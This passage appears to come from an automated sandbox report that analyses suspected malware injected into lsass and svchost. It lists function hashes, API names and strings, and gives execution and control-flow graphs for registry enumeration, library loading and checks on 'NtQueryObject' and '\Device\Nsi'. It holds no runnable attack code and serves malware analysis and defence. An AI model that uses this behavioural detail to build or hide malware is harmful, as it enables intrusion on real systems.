                                                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                • Instruction Fuzzy Hash: 7361FA7652DB84C7EB60CB15E44839A7BA1F39874CF500225EA8D47BA8EB7DDB41CB04
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: 3ac832b51b6da4c9b4b973bf2f9159b0d765b142ca189ced1ff732489cc422cd
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: C111C632A5CA0002FE98D565E45E3E550436B7437CF552624FA768E3DEFB368F4A4304
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2708871624.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdcb0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: 70dc06f7c565cf02028d5e1344b90388ac65da7d0a9fba8a964b6d096c1b0bd3
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: 70110632A4CE4005FE649167E45E3E90043AB76F7CF5C2224AB7606FD6FA3A8F424380
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
                                                                                • Opcode ID: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
                                                                                • Instruction ID: 52af176cee707ae470231b5588ad61526f764324f02d01539a8ac92cc1ad8960
                                                                                • Opcode Fuzzy Hash: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
                                                                                • Instruction Fuzzy Hash: B61196B021924883FE50DB65A84C3D53297AB647ACF144635D92A0B3D9FE3EEB06C704
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID:
                                                                                • API String ID: 1092925422-0
                                                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction ID: 65c4e098b475e352f70dc6395cf218f7b81b569124b6fa99ea398d3c25f57676
                                                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction Fuzzy Hash: 1C11487A708B4093EF149B11F4082E966A2F758B9DF04402ADE890B798FF3ED709C704
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2708871624.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdcb0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction ID: 3b4f11c57579acca9e6260cd8cc4d678e90f4f931dffd807d2415ac6866272ac
                                                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction Fuzzy Hash: 7D51B3327596048FEF18DF15E848B993796FB68B9CF958124DA0647788FB36CB41C708
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2708871624.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdcb0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction ID: c8f45d26a079089a1b3698ef975e42836bc3bfd45d26f0831fe668944e37faaf
                                                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction Fuzzy Hash: 5331C07225964486FF18DF16E84879937A6FB68BCCF158014AE4A07784EB3ACB45C708
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                • Instruction ID: 24dcad78d2841b5b21ec27df98696d3737fecaf9eec13bf351fff8f910bd68dd
                                                                                • Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                • Instruction Fuzzy Hash: FA115E31618F8892EB54DF66A8482DA7372F39AB88F048129DB8A07758EF39C255C740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction ID: 112bcaf71cb953d0bd586880c9aa20abfb9be29409723a9c0cfefd87b0a28076
                                                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction Fuzzy Hash: B151E87220C78983EE34DF69955C3EAA656F7A978CF000135DD8A07B99EA37E7058B40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction ID: 5010075a01dd40ef79e11326e5b6381b4a742213af0030611b8a090cc07568aa
                                                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction Fuzzy Hash: ED41A672218A4091EB50DF65E4493D9A7A2F398B8CF504125EE8D8B798EF3DC745CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Stringtry_get_function
                                                                                • String ID: LCMapStringEx
                                                                                • API String ID: 2588686239-3893581201
                                                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction ID: 8417189806ab5f8662dc880ff3f87f861316437b023783a6ee40e2255c0d5dcb
                                                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction Fuzzy Hash: 7A114A3620CB8086DB60CB16F4846DAB7A1F7D9BC8F544126EE8D87B19EF39C644CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction ID: fce6ffe3dbb7913867e83c386da277b62eeaad4941d52154dd0c749f50d6f5a8
                                                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction Fuzzy Hash: BD114F72209B8482EF61CF15E44429977A1F798B9CF184224DF8D0B768EF39C655CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                • String ID: InitializeCriticalSectionEx
                                                                                • API String ID: 539475747-3084827643
                                                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction ID: 5eafdd023e4cf428bb2a44b0805ce4b387830978f5eea1835fef4c3027aa3cb3
                                                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction Fuzzy Hash: A3F0823131CB8492EF05DB81F4486D57322AB98B9CF485425E95D0BB59EE3ACB99C710
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Valuetry_get_function
                                                                                • String ID: FlsSetValue
                                                                                • API String ID: 738293619-3750699315
                                                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction ID: 05651bc7bdcf09ca11739f396a60c9467aa48a5f9dcddb97cd3f456c9e5dc4cb
                                                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction Fuzzy Hash: 8FE0657120C64592EE05CB50F84C6D42223BB9878CF484021D50D0E259EE3ACB5DC710
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2708871624.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdcb0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: try_get_function
                                                                                • String ID: November$October
                                                                                • API String ID: 2742660187-1636048786
                                                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction ID: ca61c4de39712737f3cf4f66e713e3b801370783a370d7679ecab60ef7900894
                                                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction Fuzzy Hash: 9FE0923520C54A92FF04DB65F5493E962239BB4B4CF5D90219A5906253FF3ACB968780
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction ID: f10e8809f8af8c1d30320e44ac1293a3d957f3bd13b7a08073e9ade6dddfb1bd
                                                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction Fuzzy Hash: A2217172609B9482EF11CF59A4082DAB3A1FB98B9CF055120EE8C47B18FA79D7568700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction ID: e6ccd0979defd27978268ec1f10417e694653bc2cfef9fe92541daa03e9477eb
                                                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction Fuzzy Hash: ACE06D71611A0096EB04CF62D80C3C936E2FB99F09F48C024C9090B354EF7E8699C740

                                                                                Execution Graph

                                                                                Execution Coverage:0.7%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:81
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 14118 158709a2908 14119 158709a2936 14118->14119 14120 158709a2a2b LoadLibraryA 14119->14120 14121 158709a2aa7 14119->14121 14120->14119 14122 158709d1c28 14128 158709d1650 GetProcessHeap 14122->14128 14124 158709d1c3e Sleep SleepEx 14126 158709d1c37 14124->14126 14126->14124 14127 158709d15c0 StrCmpIW StrCmpW 14126->14127 14173 158709d18dc 14126->14173 14127->14126 14129 158709d1670 _set_errno_from_matherr 14128->14129 14191 158709d1274 GetProcessHeap 14129->14191 14131 158709d1678 14132 158709d1274 2 API calls 14131->14132 14133 158709d1689 14132->14133 14134 158709d1274 2 API calls 14133->14134 14135 158709d1692 14134->14135 14136 158709d1274 2 API calls 14135->14136 14137 158709d169b 14136->14137 14138 158709d16b6 RegOpenKeyExW 14137->14138 14139 158709d18ce 14138->14139 14140 158709d16e8 RegOpenKeyExW 14138->14140 14139->14126 14141 158709d1727 RegOpenKeyExW 14140->14141 14142 158709d1711 14140->14142 14144 158709d1762 RegOpenKeyExW 14141->14144 14145 158709d174b 14141->14145 14195 158709d12c8 RegQueryInfoKeyW 14142->14195 14148 158709d1786 14144->14148 14149 158709d179d RegOpenKeyExW 14144->14149 14206 158709d104c RegQueryInfoKeyW 14145->14206 14146 158709d171d RegCloseKey 14146->14141 14151 158709d12c8 11 API calls 14148->14151 14152 158709d17c1 14149->14152 14153 158709d17d8 RegOpenKeyExW 14149->14153 14154 158709d1793 RegCloseKey 14151->14154 14155 158709d12c8 11 API calls 14152->14155 14156 158709d1813 RegOpenKeyExW 14153->14156 14157 158709d17fc 14153->14157 14154->14149 14161 158709d17ce RegCloseKey 14155->14161 14159 158709d1837 14156->14159 14160 158709d184e RegOpenKeyExW 14156->14160 14158 158709d12c8 11 API calls 14157->14158 14162 158709d1809 RegCloseKey 14158->14162 14163 158709d104c 4 API calls 14159->14163 14164 158709d1872 14160->14164 14165 158709d1889 RegOpenKeyExW 14160->14165 14161->14153 14162->14156 14166 158709d1844 RegCloseKey 14163->14166 14167 158709d104c 4 API calls 14164->14167 14168 158709d18c4 RegCloseKey 14165->14168 14169 158709d18ad 14165->14169 14166->14160 14170 158709d187f RegCloseKey 14167->14170 14168->14139 14171 158709d104c 4 API calls 14169->14171 14170->14165 14172 158709d18ba RegCloseKey 14171->14172 14172->14168 14219 158709d14b4 14173->14219 14212 158709e3170 14191->14212 14194 158709d12ba _set_errno_from_matherr 14194->14131 14196 158709d1334 GetProcessHeap 14195->14196 14197 158709d1499 __free_lconv_num 14195->14197 14205 158709d134b _set_errno_from_matherr __free_lconv_num 14196->14205 14197->14146 14198 158709d1485 GetProcessHeap 14198->14197 14199 158709d135d RegEnumValueW 14199->14205 14201 158709d13dd GetProcessHeap 14201->14205 14202 158709d142f lstrlenW GetProcessHeap 14202->14205 14203 158709d1454 StrCpyW 14203->14205 14204 158709d1413 GetProcessHeap 14204->14205 14205->14198 14205->14199 14205->14201 14205->14202 14205->14203 14205->14204 14214 158709d1554 14205->14214 14207 158709d11b5 RegCloseKey 14206->14207 14208 158709d10b9 _set_errno_from_matherr __free_lconv_num 14206->14208 14207->14144 14208->14207 14209 158709d10c7 RegEnumValueW 14208->14209 14210 158709d1149 GetProcessHeap 14208->14210 14211 158709d117f GetProcessHeap 14208->14211 14209->14208 14210->14208 14211->14208 14213 158709d128f GetProcessHeap 14212->14213 14213->14194 14215 158709d15a4 14214->14215 14216 158709d156e 14214->14216 14215->14205 14216->14215 14217 158709d1585 StrCmpIW 14216->14217 14218 158709d158d StrCmpW 14216->14218 14217->14216 14218->14216 14220 158709d14d1 GetProcessHeap 14219->14220 14221 158709d14f0 GetProcessHeap 14219->14221 14222 158709d14ea __free_lconv_num 14220->14222 14223 158709d1505 __free_lconv_num 14221->14223 14222->14220 14222->14221 14224 158709d152a GetProcessHeap HeapFree 14223->14224

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                • Instruction ID: 1baf7535c3410ec2161d3171b7e8283dba7f155e76b9c631a61840aae2f455ec
                                                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                • Instruction Fuzzy Hash: 23118E7A798E09D2F7619720EC0A3E93390B7CC707F7480149A46AD1B6EF7DC4568E00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00000158709D1650: GetProcessHeap.KERNEL32 ref: 00000158709D165B
                                                                                  • Part of subcall function 00000158709D1650: HeapAlloc.KERNEL32 ref: 00000158709D166A
                                                                                  • Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D16DA
                                                                                  • Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1707
                                                                                  • Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D1721
                                                                                  • Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1741
                                                                                  • Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D175C
                                                                                  • Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D177C
                                                                                  • Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D1797
                                                                                  • Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D17B7
                                                                                  • Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D17D2
                                                                                  • Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D17F2
                                                                                • Sleep.KERNEL32 ref: 00000158709D1C43
                                                                                • SleepEx.KERNELBASE ref: 00000158709D1C49
                                                                                  • Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D180D
                                                                                  • Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D182D
                                                                                  • Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D1848
                                                                                  • Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1868
                                                                                  • Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D1883
                                                                                  • Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D18A3
                                                                                  • Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D18BE
                                                                                  • Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D18C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                • Instruction ID: b34a22e42b4636f37a58e54132c6d031f39357f6b9c0fb0c7a883a35a5189ecd
                                                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                • Instruction Fuzzy Hash: 2D31B03F244E09E1FB549B76EE4139933A5A7CCBC6F2450219E09AB7E7DF14C862CA50

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 57 158709d3930-158709d393b 58 158709d3955-158709d395c 57->58 59 158709d393d-158709d3950 StrCmpNIW 57->59 59->58 60 158709d3952 59->60 60->58
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: dialer
                                                                                • API String ID: 0-3528709123
                                                                                • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                                                • Instruction ID: 24e6d656a4f61cbc419910f8b11d390c34721bcd69d414f775461cbaa710d531
                                                                                • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                                                • Instruction Fuzzy Hash: 5CD05E39751A0AC6EB149FA28CD53A03351AB98716F58C0208A011A625DF58DD9E8E10

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2690081130.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction ID: cab338042e0fe438dd9005c5db657b42ba637fb7500d9a1f9be30a3e4a1edbb9
                                                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction Fuzzy Hash: B66124B6305A50C7EA68CF29D8407ECB392FB88B95F248021DA192B7C5DF38D853DB10

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 217 158709d2cdc-158709d2d55 call 158709eecc0 220 158709d3090-158709d30b3 217->220 221 158709d2d5b-158709d2d61 217->221 221->220 222 158709d2d67-158709d2d6a 221->222 222->220 223 158709d2d70-158709d2d73 222->223 223->220 224 158709d2d79-158709d2d89 GetModuleHandleA 223->224 225 158709d2d9d 224->225 226 158709d2d8b-158709d2d9b GetProcAddress 224->226 227 158709d2da0-158709d2dbe 225->227 226->227 227->220 229 158709d2dc4-158709d2de3 StrCmpNIW 227->229 229->220 230 158709d2de9-158709d2ded 229->230 230->220 231 158709d2df3-158709d2dfd 230->231 231->220 232 158709d2e03-158709d2e0a 231->232 232->220 233 158709d2e10-158709d2e23 232->233 234 158709d2e25-158709d2e31 233->234 235 158709d2e33 233->235 236 158709d2e36-158709d2e3a 234->236 235->236 237 158709d2e3c-158709d2e48 236->237 238 158709d2e4a 236->238 239 158709d2e4d-158709d2e57 237->239 238->239 240 158709d2f4d-158709d2f51 239->240 241 158709d2e5d-158709d2e60 239->241 242 158709d2f57-158709d2f5a 240->242 243 158709d3082-158709d308a 240->243 244 158709d2e72-158709d2e7c 241->244 245 158709d2e62-158709d2e6f call 158709d1a14 241->245 246 158709d2f5c-158709d2f68 call 158709d1a14 242->246 247 158709d2f6b-158709d2f75 242->247 243->220 243->233 249 158709d2eb0-158709d2eba 244->249 250 158709d2e7e-158709d2e8b 244->250 245->244 246->247 254 158709d2fa5-158709d2fa8 247->254 255 158709d2f77-158709d2f84 247->255 251 158709d2ebc-158709d2ec9 249->251 252 158709d2eea-158709d2eed 249->252 250->249 257 158709d2e8d-158709d2e9a 250->257 251->252 259 158709d2ecb-158709d2ed8 251->259 260 158709d2eef-158709d2ef9 call 158709d1d28 252->260 261 158709d2efb-158709d2f08 lstrlenW 252->261 264 158709d2fb5-158709d2fc2 lstrlenW 254->264 265 158709d2faa-158709d2fb3 call 158709d1d28 254->265 255->254 263 158709d2f86-158709d2f93 255->263 258 158709d2e9d-158709d2ea3 257->258 267 158709d2f43-158709d2f48 258->267 268 158709d2ea9-158709d2eae 258->268 271 158709d2edb-158709d2ee1 259->271 260->261 260->267 273 158709d2f2b-158709d2f3d call 158709d3930 261->273 274 158709d2f0a-158709d2f14 261->274 275 158709d2f96-158709d2f9c 263->275 269 158709d2fe5-158709d2fef call 158709d3930 264->269 270 158709d2fc4-158709d2fce 264->270 265->264 285 158709d2ffa-158709d3005 265->285 278 158709d2ff2-158709d2ff4 267->278 268->249 268->258 269->278 270->269 279 158709d2fd0-158709d2fe3 call 158709d1554 270->279 271->267 280 158709d2ee3-158709d2ee8 271->280 273->267 273->278 274->273 283 158709d2f16-158709d2f29 call 158709d1554 274->283 284 158709d2f9e-158709d2fa3 275->284 275->285 278->243 278->285 279->269 279->285 280->252 280->271 283->267 283->273 284->254 284->275 289 158709d3007-158709d300b 285->289 290 158709d307c-158709d3080 285->290 293 158709d3013-158709d302d call 158709d86a0 289->293 294 158709d300d-158709d3011 289->294 290->243 296 158709d3030-158709d3033 293->296 294->293 294->296 299 158709d3035-158709d3053 call 158709d86a0 296->299 300 158709d3056-158709d3059 296->300 299->300 300->290 302 158709d305b-158709d3079 call 158709d86a0 300->302 302->290
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction ID: 63d4f02c0403d5e7abc18a286324630a5ea00a4d4eeb093d581abea4177d3d45
                                                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
